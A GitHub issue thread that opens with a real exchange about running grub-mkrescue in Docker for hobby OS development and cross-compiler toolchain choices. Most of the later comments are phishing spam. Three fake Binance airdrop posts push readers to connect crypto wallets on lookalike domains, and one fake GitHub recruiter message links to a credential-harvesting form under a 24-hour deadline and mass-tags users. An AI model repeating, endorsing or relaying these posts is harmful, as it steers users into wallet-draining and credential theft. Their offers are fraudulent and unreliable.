### ISSUE TITLE
Yo

### ISSUE THREAD

**Issue by amanuel2** [kevincharm/argir#9]
How did you get grub (grub-mkrescue) to work with Docker?

**Comment by kevincharm** [comment]
Source for the Docker image I used in the Makefile is available at https://github.com/kevincharm/x86_64-elf-gcc-toolchain. Is that what you were looking for?

**Comment by amanuel2** [comment]
Yeah i actually basically used your i686 docker from what you first used and installed couple more stuff:

`sudo apt-get install nasm gcc-5 gcc-5-multilib qemu grub-common xorriso grub-pc-bin supervisor xvfb x11vnc fluxbox`

But I'm arriving at [this](https://stackoverflow.com/questions/77033182/osdev-linker-multiple-defintions-inside-docker-error) issue. If you have the time to look at the issue and maybe have some tips, I would be much grateful tysm ❤️

**Comment by kevincharm** [comment]
It's been a while since I worked on osdev stuff, but are you sure that you want to be installing an additional gcc via apt? The Dockerfile already installs the i686 (or x86_64 in my case) gcc via https://github.com/lordmilko/i686-elf-tools/releases/tag/7.1.0 - also see the notes there about supported Ubuntu versions.

**Comment by amanuel2** [comment]
Yeah sorry, I actually skipped the gcc installation, forgot to mention that. I'm gonna try to make a new image via Dockerfile. Docker is so amazing, and very hard/confusing at the same time 😅

**Comment by kevincharm** [comment]
Yeah, Docker is a gamechanger for cross compilation. I recommend just using lordmilko's binaries or script to install the cross compiler toolchain within your Dockerfile. Definitely do not use apt to install gcc because it won't be "freestanding" and will probably just poison any cross compiler toolchain installation.

**Comment by amanuel2** [comment]
What do you mean by "freestanding", but yeah I can definitely see how that will poison the toolchain thanks for the insight! 
Also, do you have gitter or skype by any chance?

**Comment by kevincharm** [comment]
I'm probably remembering the wrong term there. But you want the i686 gcc that can compile without the hosted stdlib, not the one from apt (which would be dependent on your Docker arch). I use neither gitter/skype, but you can contact me on twitter or telegram (same username everywhere)

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by kongkiatchanu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @yaoyepeng, @tusuii, @fab-kay, @Patavix, @Martin-57blocks, @MattKetmo, @RegisGraptin

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
0xgator, @gbarboza, @JeanOsorio, @ConnorBlockchain, @tuxcanfly, @mark1yo, @kang-hong-29, @abelb01, @AlphaPlant, @LimbicSys, @yqrashawn, @PilotDebug, @Dsummers91, @evercreativedev, @alkimiyst, @hacker-DOM, @chuheng001, @albertofem, @eferbarn, @ashishb
